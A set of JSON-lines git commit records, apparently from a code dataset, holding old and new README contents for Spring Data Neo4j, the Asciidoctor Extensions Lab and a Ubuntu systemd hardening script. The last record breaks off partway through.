\"forum\":http:\/\/forum.springsource.org\/forumdisplay.php?f=80. If you are new to Spring as well as to Spring Data, look for information about \"Spring projects\":http:\/\/www.springsource.org\/projects.\n\n\nYou will also find help on http:\/\/stackoverflow.com\/questions\/tagged\/spring-data-neo4j[StackOverflow]\n\n== Contributing to Spring Data Neo4j\n\nThere are dedicated, mandatory https:\/\/github.com\/spring-projects\/spring-data-build\/blob\/master\/CONTRIBUTING.adoc[contribution guidelines] for all Spring Data projects.\n\nHere are some ways for you to get involved in the community:\n\n* Get involved with Spring Data Neo4j community on the http:\/\/groups.google.com\/group\/neo4j[Neo4j Google Group] and by helping on http:\/\/stackoverflow.com\/questions\/tagged\/spring-data-neo4j[StackOverflow].\n* Create https:\/\/jira.springframework.org\/browse\/DATAGRAPH[JIRA] tickets for bugs and new features and comment and vote on the ones that you are interested in.\n* Github is for social coding: if you want to write code, we encourage contributions through *pull requests* from a fork of this repository.\n If you want to contribute code this way, please read the https:\/\/github.com\/spring-projects\/spring-data-build\/blob\/master\/CONTRIBUTING.adoc[contribution guidelines] for details.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f27ccd92a714e0a48c9bd86048a0388c037fafda","subject":"README copyedits","message":"README copyedits\n","repos":"taky\/asciidoctor-extensions-lab,taky\/asciidoctor-extensions-lab,taky\/asciidoctor-extensions-lab","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Asciidoctor Extensions Lab\n:idprefix:\n:idseparator: -\n:toc: preamble\n\nA repository of sample and incubating Ruby-based extensions for Asciidoctor.\n\nIf you simply want to use the extensions in this repository, skip ahead to <<using-an-extension>>.\nTo create your own extension, we recommend that you first read the http:\/\/asciidoctor.org\/docs\/user-manual\/#extensions[extensions section] in the Asciidoctor user manual.\n\n== Extension types\n\nWe have the following types of extensions in the lab:\n\n- *Preprocessor* - processes the AsciiDoc source before it is parsed\n- *IncludeProcessor* - intercepts the AsciiDoc include directive\n- *Treeprocessor* - processes the parsed AsciiDoc document (AST)\n- *Postprocessor* - processes the converted output before it is written to the output stream (or disk)\n- *BlockProcessor* - adds a custom delimited block\n- *BlockMacroProcessor* - adds a custom block macro\n- *InlineMacroProcessor* - adds a custom inline macro\n\nThe type of extension (e.g, `-block-macro`) is always used in the name of the extension registration file and directory to make it easy to distinguish.\nYou can also look for examples using `git grep`.\nFor example, to look for a `BlockMacroProcessor`, run the following command:\n\n $ git grep BlockMacroProcessor lib\/\n\nYou'll get a result like this:\n\n....\nlib\/chart-block-macro\/extension.rb:class ChartBlockMacro < Extensions::BlockMacroProcessor\nlib\/gist-block-macro\/extension.rb:class GistBlockMacro < Extensions::BlockMacroProcessor\nlib\/pass-block-macro\/extension.rb:class PassBlockMacro < Extensions::BlockMacroProcessor\nlib\/tree-block-macro\/extension.rb:class TreeBlockMacro < Asciidoctor::Extensions::BlockMacroProcessor\n....\n\n== Extension files\n\nEach extension consists of several files:\n\n- A file that registers the extension (sometimes also contains the extension)\n- A file with the extension itself (when not defined in the registration file)\n- A file with sample AsciiDoc source to use to test the extension\n- Auxiliary assets needed by the extension\n\nFor example, the emoji-inline-macro extension has four files:\n\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro.rb[lib\/emoji-inline-macro.rb] (registration file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/extension.rb[lib\/emoji-inline-macro\/extension.rb] (extension file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/sample.adoc[lib\/emoji-inline-macro\/sample.adoc] (sample AsciiDoc file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/twemoji-awesome.css[lib\/emoji-inline-macro\/twemoji-awesome.css] (auxiliary asset file)\n\nNOTE: The registration file (e.g., emoji-inline-macro.rb) goes in the [path]_lib_ directory whereas the remaining files go inside a directory whose base name matches the name of the registration file (e.g., emoji-inline-macro).\n\n== Extension catalog\n\nThe following extensions are available in the lab.\n\nChartBlockMacro, link:lib\/chart-block-macro.rb[]::\nAdds a chart block and block macro to AsciiDoc powered by c3js, chartist or chartjs.\n\nChromeInlineMacro, link:lib\/chrome-inline-macro.rb[]::\nAdds an inline macro for linking to a `chrome:\/\/` URI.\n\nCopyrightFooterPostprocessor, link:lib\/copyright-footer-postprocessor.rb[]::\nAdds a copyright to the document footer based on the value of the `copyright` attribute.\n\nEmojiInlineMacro, link:lib\/emoji-inline-macro.rb[]::\nAdds an emoji inline macro for inserting emoji by name.\n\nFrontMatterPreprocessor, link:lib\/front-matter-preprocessor.rb[]::\nEmulates the built-in behavior of Asciidoctor to sweep away YAML front matter into the `front-matter` attribute.\n\nGistBlockMacro, link:lib\/gist-block-macro.rb[]::\nAdds a block macro to embed a gist into an AsciiDoc document.\n\nGoogleAnalyticsPostprocessor, link:lib\/google-analytics-postprocessor.rb[]::\nAdds the Google Analytics code for the account identified by the `google-analytics-account` attribute to the end of the HTML document.\n\nHardbreaksPreprocessor, link:lib\/hardbreaks-preprocessor.rb[]::\nAdds hardbreaks to the end of all non-empty lines that aren't section titles.\n\nImplicitApidocInlineMacro, link:lib\/implicit-apidoc-inline-macro.rb[]::\nAdds an inline macro for linking to the Javadoc of a class in the Java EE API.\n\nLicenseUrlDocinfoProcessor, link:lib\/license-url-docinfoprocessor.rb[]::\nAdds a link to the license specified by the `license` attribute to the document header.\n\nManInlineMacro, link:lib\/man-inline-macro.rb[]::\nAdds an inline macro for linking to another man page (used in the Git documentation).\n\nMathematicalTreeprocessor, link:lib\/mathematical-treeprocessor.rb[]::\nConverts all latexmath blocks to SVG using the Mathematical library.\n\nMathoidTreeprocessor, link:lib\/mathoid-treeprocessor.rb[]::\nConverts all stem blocks to SVG using MathJax via the Mathoid library.\n\nMentionsInlineMacro, link:lib\/mentions-inline-macro.rb[]::\nDetects Twitter-style username mentions and converts them to links.\n\nPassBlockMacro, link:lib\/pass-block-macro.rb[]::\nAdds a pass block macro to AsciiDoc.\n\nPickInlineMacro, link:lib\/pick-inline-macro.rb[]::\nAdds an inline macro for selecting between two values based on the value of another attribute.\n\nPullquoteInlineMacro, link:lib\/pullquote-inline-macro.rb[]::\nAdds an inline macro to pull a quote out of the flow and display it in a sidebar.\n\nSectnumoffsetTreeprocessor, link:lib\/sectnumoffset-treeprocessor.rb[]::\nIncrements all level-1 section numbers (and subsequently all subsections) by the value of the `sectnumoffset` attribute.\n\nShellSessionTreeprocessor, link:lib\/shell-session-treeprocessor.rb[]::\nDetects a shell command and trailing output and styles it for display in HTML.\n\nShoutBlock, link:lib\/shout-block.rb[]::\nConverts all text inside a delimited block named `shout` to uppercase and adds trailing exclamation marks.\n\nShowCommentsPreprocessor, link:lib\/showcomments-preprocessor.rb[]::\nConverts line comments to visual elements (normally dropped).\n\nSlimBlock, link:lib\/slim-block.rb[]::\nPasses the content in blocks named `slim` to the Slim template engine for processing.\n\nStepsPostprocessor, link:lib\/steps-postprocessor.rb[]::\nStyles an ordered list as a procedure list.\n\nTexPreprocessor, link:lib\/tex-preprocessor.rb[]::\nInterprets tex markup embedded inside of AsciiDoc.\n\nTextqlBlock, link:lib\/textql-block.rb[]::\nAdds a block for using textql to process data in an AsciiDoc document.\n\nTreeBlockMacro, link:lib\/tree-block-macro.rb[]::\nAdds a block macro to show the output of the `tree` command.\n\nUndoReplacementsPostprocessor, link:lib\/undo-replacements-postprocessor.rb[]::\nReverses the text replacements that are performed by Asciidoctor.\n\nUriIncludeProcessor, link:lib\/uri-include-processor.rb[]::\nEmulates the built-in behavior of Asciidoctor to include content from a URI.\n\nViewResultPostprocessor, link:lib\/view-result-postprocessor.rb[]::\nAdds an interactive toggle to block content marked as a view result.\n\nWhitespaceIncludeProcessor, link:lib\/whitespace-include-processor.rb[]::\nAn include processor that substitutes tabs with spaces (naively) in included source code.\n\nXmlEntityPostprocessor, link:lib\/xml-entity-postprocessor.rb[]::\nConverts named entities to character entities so they can be resolved without the use of external entity declarations.\n\n\/\/^\n\n== Using an extension\n\nBefore creating your own extensions, it would be wise to run one yourself.\nFirst, make sure Asciidoctor is installed:\n\n $ gem install asciidoctor\n\nNext, run the extension from the root directory of the project:\n\n $ asciidoctor -r lib\/emoji-inline-macro.rb lib\/emoji-inline-macro\/sample.adoc\n # asciidoctor: FAILED: 'lib\/emoji-inline-macro.rb' could not be loaded\n # Use --trace for backtrace\n\nOops!\nWe forgot to include the leading `.\/` when using the `-r` flag\nLet's try again:\n\n $ asciidoctor -r .\/lib\/emoji-inline-macro.rb lib\/emoji-inline-macro\/sample.adoc\n\nAll right, it ran!\nThe output file, [path]_sample.html_, was created in the same directory as the source file, [path]_sample.adoc_.\n\nThe relevant bits of the input and output are shown below.\n\n._lib\/emoji-inline-macro\/sample.adoc_\n```asciidoc\nFaster than a emoji:turtle[1x]!\n\nThis is an example of how you can emoji:heart[lg] Asciidoctor and Twitter Emoji.\n```\n\n._lib\/emoji-inline-macro\/sample.html_\n```html\n<div class=\"paragraph\">\n<p>Faster than a <i class=\"twa twa-1x twa-turtle\"><\/i>!<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>This is an example of how you can <i class=\"twa twa-lg twa-heart\"><\/i> Asciidoctor and Twitter Emoji.<\/p>\n<\/div>\n```\n\nWARNING: Certain extensions require additional libraries.\nPlease consult the extension's registration file for details about what is required to use it.\n\n== Adding an extension\n\nYou can find examples of various ways to define an extension in the link:lib\/shout-block.rb[] extension.\n\n=== Shorthand (DSL)\n\nIf you're creating a trivial extension, you can define the extension using the extension DSL directly in the registration file.\nCreate a new file in the [path]_lib_ directory.\nInclude the extension type in the name of the file so others are clear what type of extension it is.\n\n._lib\/sample-block.rb_\n```ruby\nrequire 'asciidoctor\/extensions' unless RUBY_ENGINE == 'opal'\n\ninclude Asciidoctor\n\nExtensions.register do\n block do\n named :sample\n on_context :open\n\n process do |parent, reader, attrs|\n create_paragraph parent, reader.lines, attrs\n end\n end\nend\n```\n\nTIP: The `include Asciidoctor` line allows you to use classes from Asciidoctor without the `Asciidoctor::` prefix.\n\n=== Formal\n\nIf you're creating a more complex extension or want to enable reuse, you're encouraged to move the extension code to the [path]_extension.rb_ inside a directory with the same base name as the registration file.\nIn the case of a block, block macro or inline macro, this enables you to register the extension multiple times.\n\n._lib\/sample-block.rb_\n```ruby\nRUBY_ENGINE == 'opal' ? (require 'sample-block\/extension') : (require_relative 'sample-block\/extension')\n\nExtensions.register do\n block SampleBlock\nend\n```\n\n._lib\/sample-block\/extensions.rb_\n```ruby\nclass SampleBlock < Extensions::BlockProcessor\n use_dsl\n named :sample\n on_context :open\n\n def process parent, reader, attrs\n create_paragraph parent, reader.lines, attrs\n end\nend\n```\n\nIt's customary to provide a sample AsciiDoc file named [path]_sample.adoc_ inside the extension subdirectory that others can use to try the extension.\nYou should also add your extension to the <<extension-catalog>> section along with a short description of what it does.\n\n== Other extensions\n\nSee http:\/\/asciidoctor.org\/docs\/extensions\/[this list] of extensions for Asciidoctor.\n\n\/\/\/\/\n== Transpiling extensions for Asciidoctor.js\n\nhttps:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/issues\/44[TODO].\n\/\/\/\/\n","old_contents":"= Asciidoctor Extensions Lab\n:idprefix:\n:idseparator: -\n:toc: preamble\n\nA repository of sample and incubating Ruby-based extensions for Asciidoctor.\n\nIf you just want to use the extensions here, skip ahead to <<using-an-extension>>.\nTo create your own extension, we recommend that you first read the http:\/\/asciidoctor.org\/docs\/user-manual\/#extensions[extensions section] in the Asciidoctor user manual.\n\n== Extension types\n\nWe have these types of extensions in the lab:\n\n- *Preprocessor* - processes the AsciiDoc source before it is parsed\n- *IncludeProcessor* - intercepts the AsciiDoc include directive\n- *Treeprocessor* - processes the parsed AsciiDoc document (AST)\n- *Postprocessor* - processes the converted output before it is written to the output stream (or disk)\n- *BlockProcessor* - adds a custom delimited block\n- *BlockMacroProcessor* - adds a custom block macro\n- *InlineMacroProcessor* - adds a custom inline macro\n\nThe type of extension (e.g, `-block-macro`) is always used in the name of the extension load file and directory to make it easy to distinguish.\nYou can also look for examples using `git grep`.\nFor example, to look for a `BlockMacroProcessor`, run the following command:\n\n $ git grep BlockMacroProcessor lib\/\n\nYou will get a result like this:\n\n....\nlib\/chart-block-macro\/extension.rb:class ChartBlockMacro < Extensions::BlockMacroProcessor\nlib\/gist-block-macro\/extension.rb:class GistBlockMacro < Extensions::BlockMacroProcessor\nlib\/pass-block-macro\/extension.rb:class PassBlockMacro < Extensions::BlockMacroProcessor\nlib\/tree-block-macro\/extension.rb:class TreeBlockMacro < Asciidoctor::Extensions::BlockMacroProcessor\n....\n\n== Extension files\n\nEach extension consists of several files:\n\n- A file that registers the extension (sometimes also contains the extension)\n- A file with the extension itself (when not defined in the registration file)\n- A file with sample AsciiDoc source to use to test the section\n- Auxiliary assets needed by the extension\n\nFor example, the emoji-inline-macro extension has four files:\n\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro.rb[lib\/emoji-inline-macro.rb] (registration file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/extension.rb[lib\/emoji-inline-macro\/extension.rb] (extension file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/sample.adoc[lib\/emoji-inline-macro\/sample.adoc] (sample AsciiDoc file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/twemoji-awesome.css[lib\/emoji-inline-macro\/twemoji-awesome.css] (auxiliary asset file)\n\nNOTE: The registration file (e.g., emoji-inline-macro.rb) goes in the [path]_lib_ directory whereas the remaining files go inside a directory whose base name matches the name of the registration file (e.g., emoji-inline-macro).\n\n== Extension catalog\n\nThe following extensions are available in the lab.\n\nChartBlockMacro, link:lib\/chart-block-macro.rb[]::\nAdds a chart block and block macro to AsciiDoc powered by c3js, chartist or chartjs.\n\nChromeInlineMacro, link:lib\/chrome-inline-macro.rb[]::\nAdds an inline macro for linking to a `chrome:\/\/` URI.\n\nCopyrightFooterPostprocessor, link:lib\/copyright-footer-postprocessor.rb[]::\nAdds a copyright to the document footer based on the value of the `copyright` attribute.\n\nEmojiInlineMacro, link:lib\/emoji-inline-macro.rb[]::\nAdds an emoji inline macro for inserting emoji by name.\n\nFrontMatterPreprocessor, link:lib\/front-matter-preprocessor.rb[]::\nEmulates the built-in behavior of Asciidoctor to sweep away YAML front matter into the `front-matter` attribute.\n\nGistBlockMacro, link:lib\/gist-block-macro.rb[]::\nAdds a block macro to embed a gist into an AsciiDoc document.\n\nGoogleAnalyticsPostprocessor, link:lib\/google-analytics-postprocessor.rb[]::\nAdds the Google Analytics code for the account identified by the `google-analytics-account` attribute to the end of the HTML document.\n\nHardbreaksPreprocessor, link:lib\/hardbreaks-preprocessor.rb[]::\nAdds hardbreaks to the end of all non-empty lines that aren't section titles.\n\nImplicitApidocInlineMacro, link:lib\/implicit-apidoc-inline-macro.rb[]::\nAdds an inline macro for linking to the Javadoc of a class in the Java EE API.\n\nLicenseUrlDocinfoProcessor, link:lib\/license-url-docinfoprocessor.rb[]::\nAdds a link to the license specified by the `license` attribute to the document header.\n\nManInlineMacro, link:lib\/man-inline-macro.rb[]::\nAdds an inline macro for linking to another man page (used in the Git documentation).\n\nMathematicalTreeprocessor, link:lib\/mathematical-treeprocessor.rb[]::\nConverts all latexmath blocks to SVG using the Mathematical library.\n\nMathoidTreeprocessor, link:lib\/mathoid-treeprocessor.rb[]::\nConverts all stem blocks to SVG using MathJax via the Mathoid library.\n\nMentionsInlineMacro, link:lib\/mentions-inline-macro.rb[]::\nDetects Twitter-style username mentions and converts them to links.\n\nPassBlockMacro, link:lib\/pass-block-macro.rb[]::\nAdds a pass block macro to AsciiDoc.\n\nPickInlineMacro, link:lib\/pick-inline-macro.rb[]::\nAdds an inline macro for selecting between two values based on the value of another attribute.\n\nPullquoteInlineMacro, link:lib\/pullquote-inline-macro.rb[]::\nAdds an inline macro to pull a quote out of the flow and display it in a sidebar.\n\nSectnumoffsetTreeprocessor, link:lib\/sectnumoffset-treeprocessor.rb[]::\nIncrements all level-1 section numbers (and subsequently all subsections) by the value of the `sectnumoffset` attribute.\n\nShellSessionTreeprocessor, link:lib\/shell-session-treeprocessor.rb[]::\nDetects a shell command and trailing output and styles it for display in HTML.\n\nShoutBlock, link:lib\/shout-block.rb[]::\nConverts all text inside a delimited block named `shout` to uppercase and adds trailing exclamation marks.\n\nShowCommentsPreprocessor, link:lib\/showcomments-preprocessor.rb[]::\nConverts line comments to visual elements (normally dropped).\n\nSlimBlock, link:lib\/slim-block.rb[]::\nPasses the content in blocks named `slim` to the Slim template engine for processing.\n\nStepsPostprocessor, link:lib\/steps-postprocessor.rb[]::\nStyles an ordered list as a procedure list.\n\nTexPreprocessor, link:lib\/tex-preprocessor.rb[]::\nInterprets tex markup embedded inside of AsciiDoc.\n\nTextqlBlock, link:lib\/textql-block.rb[]::\nAdds a block for using textql to process data in an AsciiDoc document.\n\nTreeBlockMacro, link:lib\/tree-block-macro.rb[]::\nAdds a block macro to show the output of the `tree` command.\n\nUndoReplacementsPostprocessor, link:lib\/undo-replacements-postprocessor.rb[]::\nReverses the text replacements that are performed by Asciidoctor.\n\nUriIncludeProcessor, link:lib\/uri-include-processor.rb[]::\nEmulates the built-in behavior of Asciidoctor to include content from a URI.\n\nViewResultPostprocessor, link:lib\/view-result-postprocessor.rb[]::\nAdds an interactive toggle to block content marked as a view result.\n\nWhitespaceIncludeProcessor, link:lib\/whitespace-include-processor.rb[]::\nAn include processor that substitutes tabs with spaces (naively) in included source code.\n\nXmlEntityPostprocessor, link:lib\/xml-entity-postprocessor.rb[]::\nConverts named entities to character entities so they can be resolved without the use of external entity declarations.\n\n\/\/^\n\n== Using an extension\n\nBefore create your own extensions, it would be wise to run one yourself.\nFirst, make sure Asciidoctor is installed:\n\n $ gem install asciidoctor\n\nNext, we'll run an extension from the root directory of the project:\n\n $ asciidoctor -r lib\/emoji-inline-macro.rb lib\/emoji-inline-macro\/sample.adoc\n # asciidoctor: FAILED: 'lib\/emoji-inline-macro.rb' could not be loaded\n # Use --trace for backtrace\n\nOops!\nWe forgot to include the leading `.\/` when using the `-r` flag\nLet's try again:\n\n $ asciidoctor -r .\/lib\/emoji-inline-macro.rb lib\/emoji-inline-macro\/sample.adoc\n\nAll right, it ran!\nThe output file, [path]_sample.html_, was created in the same directory as the source file, [path]_sample.adoc_.\n\nThe relevant bits of the input and output are show below.\n\n._lib\/emoji-inline-macro\/sample.adoc_\n```asciidoc\nFaster than a emoji:turtle[1x]!\n\nThis is an example of how you can emoji:heart[lg] Asciidoctor and Twitter Emoji.\n```\n\n._lib\/emoji-inline-macro\/sample.html_\n```html\n<div class=\"paragraph\">\n<p>Faster than a <i class=\"twa twa-1x twa-turtle\"><\/i>!<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>This is an example of how you can <i class=\"twa twa-lg twa-heart\"><\/i> Asciidoctor and Twitter Emoji.<\/p>\n<\/div>\n```\n\nWARNING: Certain extensions require additional libraries.\nPlease consult the registration file for the extension for details about what is required to use it.\n\n== Adding an extension\n\nYou can find examples of various ways to define an extension in the link:lib\/shout-block.rb[] extension.\n\n=== Shorthand (DSL)\n\nIf you're creating a trivial extension, you can define the extension using the extension DSL directly in the registration file.\nCreate a new file in the [path]_lib_ directory.\nInclude the extension type in the name of the file so others are clear what type of extension it is.\n\n._lib\/sample-block.rb_\n```ruby\nrequire 'asciidoctor\/extensions' unless RUBY_ENGINE == 'opal'\n\ninclude Asciidoctor\n\nExtensions.register do\n block do\n named :sample\n on_context :open\n\n process do |parent, reader, attrs|\n create_paragraph parent, reader.lines, attrs\n end\n end\nend\n```\n\nTIP: The `include Asciidoctor` line allows you to use classes from Asciidoctor without the `Asciidoctor::` prefix.\n\n=== Formal\n\nIf you are creating a more complex extension or want to enable reuse, you are encouraged to move the extension code to the [path]_extension.rb_ inside a directory with the same base name as the registration file.\nIn the case of a block, block macro or inline macro extension, this enables you to register it multiple times.\n\n._lib\/sample-block.rb_\n```ruby\nRUBY_ENGINE == 'opal' ? (require 'sample-block\/extension') : (require_relative 'sample-block\/extension')\n\nExtensions.register do\n block SampleBlock\nend\n```\n\n._lib\/sample-block\/extensions.rb_\n```ruby\nclass SampleBlock < Extensions::BlockProcessor\n use_dsl\n named :sample\n on_context :open\n\n def process parent, reader, attrs\n create_paragraph parent, reader.lines, attrs\n end\nend\n```\n\nIt's customary to provide a sample AsciiDoc file named [path]_sample.adoc_ inside the extension subdirectory that others can use to test the extension.\nYou should also add your extension to the <<extension-catalog>> section along with a short description of what it does.\n\n== Other extensions\n\nSee http:\/\/asciidoctor.org\/docs\/extensions\/[this list] of extensions for Asciidoctor.\n\n\/\/\/\/\n== Transpiling extensions for Asciidoctor.js\n\nhttps:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/issues\/44[TODO].\n\/\/\/\/\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"26280ab823a17130be58164da7e0194b7edf5bf7","subject":"mention Zapus","message":"mention Zapus\n\nSigned-off-by: Thomas Sj\u00f6gren <9ff28d1cb1d19283ed3327b40df6c7d62d8bc343@users.noreply.github.com>\n","repos":"konstruktoid\/hardening,konstruktoid\/hardening","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Hardening Ubuntu. Systemd edition.\n:icons: font\n\nA quick way to make a Ubuntu server a bit more secure.\n\nTested on `15.10 Ubuntu Wily Werewolf`, `16.04 Xenial Xerus`, `16.10 Yakkety Yak` and `17.04 Zesty Zapus (development branch)`. +\nSystemd required.\n\nIf you're just interested in the security focused systemd configuration, it's available as a link:systemd.adoc[separate document]. +\nIf you're interested in testing your host settings, you'll find the link:README.adoc#tests[instructions here]. +\nIf you're using Ansible, a playbook with most of the above functions implemented is available in my Ansible repository https:\/\/github.com\/konstruktoid\/Ansible[konstruktoid\/Ansible].\n\nNOTE: This is a constant work in progress. Make sure you understand what it does. Read the code.\n\n== Howto\nStart the installation of the server. +\nPick language, keyboard layout, timezone and so on as you usually would.\n\n=== Partition the system\n[source,shell]\n----\n\/\n\/boot (rw)\n\/home (rw,nosuid,nodev)\nswap\n\/var\n\/var\/log (rw,nosuid,nodev,noexec)\n\/var\/log\/audit (rw,nosuid,nodev,noexec)\n----\n\nNote that `\/tmp` and `\/var\/tmp` will be added automatically by the script.\n\n=== Login, set a Grub2 password, configure and run ubuntu.sh\nDo not add any packages. +\nLog in. +\nSelect a Grub2 password (using `grub-mkpasswd-pbkdf2`). +\nDownload the script using `git clone https:\/\/github.com\/konstruktoid\/hardening.git`. + \nChange the configuration options in the `ubuntu.cfg` file and last but not least run the script, `sudo bash ubuntu.sh`. +\n\n== Configuration options\n[source,shell]\n----\nFW_ADMIN='127.0.0.1' \/\/ <1>\nSSH_GRPS='sudo' \/\/ <2>\nSYSCTL_CONF='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/sysctl.conf' \/\/ <3>\nAUDITD_RULES='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/audit.rules' \/\/ <4>\nLOGROTATE_CONF='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/logrotate.conf' \/\/ <5>\nNTPSERVERPOOL='0.ubuntu.pool.ntp.org 1.ubuntu.pool.ntp.org 2.ubuntu.pool.ntp.org 3.ubuntu.pool.ntp.org pool.ntp.org' \/\/ <6>\nVERBOSE='N' \/\/ <7>\nCHANGEME='' \/\/ <8>\n\n# Configuration files\nADDUSER='\/etc\/adduser.conf'\nAUDITDCONF='\/etc\/audit\/auditd.conf'\nAUDITRULES='\/etc\/audit\/rules.d\/hardening.rules'\nCOMMONPASSWD='\/etc\/pam.d\/common-password'\nCOMMONACCOUNT='\/etc\/pam.d\/common-account'\nCOMMONAUTH='\/etc\/pam.d\/common-auth'\nDEFAULTGRUB='\/etc\/default\/grub'\nDISABLEMNT='\/etc\/modprobe.d\/disablemnt.conf'\nDISABLEMOD='\/etc\/modprobe.d\/disablemod.conf'\nDISABLENET='\/etc\/modprobe.d\/disablenet.conf'\nJOURNALDCONF='\/etc\/systemd\/journald.conf'\nLIMITSCONF='\/etc\/security\/limits.conf'\nLOGINDCONF='\/etc\/systemd\/logind.conf'\nLOGINDEFS='\/etc\/login.defs'\nLOGROTATE='\/etc\/logrotate.conf'\nPAMLOGIN='\/etc\/pam.d\/login'\nRESOLVEDCONF='\/etc\/systemd\/resolved.conf'\nRKHUNTERCONF='\/etc\/default\/rkhunter'\nSECURITYACCESS='\/etc\/security\/access.conf'\nSSHDFILE='\/etc\/ssh\/sshd_config'\nSYSCTL='\/etc\/sysctl.conf'\nSYSTEMCONF='\/etc\/systemd\/system.conf'\nTIMESYNCD='\/etc\/systemd\/timesyncd.conf'\nUFWDEFAULT='\/etc\/default\/ufw'\nUSERADD='\/etc\/default\/useradd'\nUSERCONF='\/etc\/systemd\/user.conf'\n----\n<1> The IP addresses that will be able to connect with SSH.\n<2> Which group the users have to be member of in order to acess via SSH.\n<3> Stricter sysctl settings.\n<4> Auditd rules.\n<5> Logrotate settings.\n<6> NTP server pool.\n<7> If you want all the details or not.\n<8> Add something just to verify that you actually glanced the code.\n\n=== Function list\n`pre` Script setup +\n`firewall` Enable ufw and allow port 22 from `$FW_ADMIN` +\n`disablenet` Disable misc network protocols +\n`disablemnt` Disable misc file systems +\n`disablemod` Disable misc kernel modules +\n`resolvedconf` Systemd\/resolved.conf +\n`systemdconf` Systemd\/system.conf and Systemd\/user.conf +\n`journalctl` Systemd\/journald.conf and logrotate.conf +\n`timesyncd` Systemd\/timesyncd.conf +\n`coredump` Systemd\/coredump.conf +\n`fstab` \/etc\/fstab, system\/tmp.mount and system\/var-tmp.mount +\n`prelink` Prelink +\n`aptget` Updating the package index and upgrading installed packages +\n`hosts` \/etc\/hosts.allow and \/etc\/hosts.deny +\n`issue` Add message to \/etc\/issue, \/etc\/issue.net, \/etc\/motd +\n`logindefs` \/etc\/login.defs +\n`logindconf` Systemd\/logind.conf +\n`sysctl` \/etc\/sysctl.conf +\n`limitsconf` \/etc\/security\/limits.conf +\n`adduser` \/etc\/adduser.conf and \/etc\/default\/useradd +\n`rootaccess` \/etc\/security\/access.conf and \/etc\/securetty +\n`packages` Installing base packages +\n`apport` Disable apport +\n`rkhunter` Configures rkhunter +\n`sshdconfig` \/etc\/ssh\/sshd_config +\n`password` \/etc\/pam.d\/common-password and \/etc\/pam.d\/common-auth +\n`cron` \/etc\/cron and \/etc\/at +\n`ctrlaltdel` Ctrl-alt-delete +\n`auditd` Auditd +\n`aide` Aide +\n`rhosts` .rhosts +\n`users` Remove users +\n`lockroot` Lock root user account +\n`aptget_clean` Remove unused packages +\n`suid` Remove suid bits +\n`umask` Set umask +\n`path` Modify paths +\n`aa_enforce` Enforce apparmor profiles +\n`aide_post` Create Aide db +\n`aide_timer` Enable daily Aide check +\n`systemddelta` systemd-delta +\n`checkreboot` Check if reboot is required\n\n== Tests\nThere are approximately 275 https:\/\/github.com\/sstephenson\/bats[Bats tests] for most of the above settings available in the link:tests\/[tests directory].\n\n[source,shell]\n----\ngit clone https:\/\/github.com\/konstruktoid\/hardening.git\ncd tests\/\nsudo bats .\n----\n\n== Recommended reading\nhttps:\/\/benchmarks.cisecurity.org\/downloads\/show-single\/index.cfm?file=independentlinux.100[CIS Distribution Independent Linux Benchmark v1.0.0] +\nhttp:\/\/iase.disa.mil\/stigs\/os\/unix-linux\/Pages\/index.aspx[Draft Red Hat 7 STIG Version 1, Release 0.1] +\nhttps:\/\/benchmarks.cisecurity.org\/downloads\/show-single\/?file=ubuntu1404.100[CIS Ubuntu 14.04 LTS Server Benchmark v1.0.0] +\nhttps:\/\/wiki.ubuntu.com\/Security\/Features +\nhttps:\/\/help.ubuntu.com\/community\/StricterDefaults +\n\n","old_contents":"= Hardening Ubuntu. Systemd edition.\n:icons: font\n\nA quick way to make a Ubuntu server a bit more secure.\n\nTested on `15.10 Ubuntu Wily Werewolf`, `16.04 Xenial Xerus` and `16.10 Yakkety Yak`. +\nSystemd required.\n\nIf you're just interested in the security focused systemd configuration, it's available as a link:systemd.adoc[separate document]. +\nIf you're interested in testing your host settings, you'll find the link:README.adoc#tests[instructions here]. +\nIf you're using Ansible, a playbook with most of the above functions implemented is available in my Ansible repository https:\/\/github.com\/konstruktoid\/Ansible[konstruktoid\/Ansible].\n\nNOTE: This is a constant work in progress. Make sure you understand what it does. Read the code.\n\n== Howto\nStart the installation of the server. +\nPick language, keyboard layout, timezone and so on as you usually would.\n\n=== Partition the system\n[source,shell]\n----\n\/\n\/boot (rw)\n\/home (rw,nosuid,nodev)\nswap\n\/var\n\/var\/log (rw,nosuid,nodev,noexec)\n\/var\/log\/audit (rw,nosuid,nodev,noexec)\n----\n\nNote that `\/tmp` and `\/var\/tmp` will be added automatically by the script.\n\n=== Login, set a Grub2 password, configure and run ubuntu.sh\nDo not add any packages. +\nLog in. +\nSelect a Grub2 password (using `grub-mkpasswd-pbkdf2`). +\nDownload the script using `git clone https:\/\/github.com\/konstruktoid\/hardening.git`. + \nChange the configuration options in the `ubuntu.cfg` file and last but not least run the script, `sudo bash ubuntu.sh`. +\n\n== Configuration options\n[source,shell]\n----\nFW_ADMIN='127.0.0.1' \/\/ <1>\nSSH_GRPS='sudo' \/\/ 